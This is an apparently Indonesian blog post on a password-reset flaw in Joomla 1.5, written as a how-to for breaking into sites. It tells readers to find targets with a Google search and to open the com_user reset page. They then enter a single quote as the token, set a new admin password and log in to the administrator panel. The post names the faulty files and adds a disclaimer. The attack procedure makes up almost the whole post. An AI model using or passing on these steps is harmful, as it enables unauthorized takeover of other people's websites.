Hati-hati dengan Joomla 1.5


Joomla merupakan salah satu content management system (CMS) yang cukup populer. Namun, Joomla terbaru, versi 1.5, memiliki celah keamanan yang cukup fatal. Polanya sama dengan SQL Injection yang relatif kuno.

Berikut ini cara-cara membobol situs berbasis Joomla 1.5.

1. Buka alamat target yang menggunakan Joomla 1.5. Anda bisa menemukan di Google dengan mengetikkan “by Joomla 1.5″ di kolom pencrian.

2. Tambahkan baris di bawah ini setelah alamat target.
target.com/index.php?option=com_user&view=reset&layout=confirm

3. Tuliskan pada kolom “token” karakter ‘ dan klik OK.

4. Isi password baru untuk admin.

5. Buka halaman target.com/administrator/.

6. Login admin dengan password baru.

Cara ini terjadi karena kesalahan coding pada file

/components/com_user/models/reset.php dan

/components/com_user/models/controller.php.

Posting ini hanya untuk pengetahuan. Segala bentuk penyalahgunaaan adalah tanggung jawab masing-masing orang.

Satu Tanggapan

  1. I appreciate you for this page, I was looking for Avast Antivirus on Google and found this site.

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

%d blogger menyukai ini: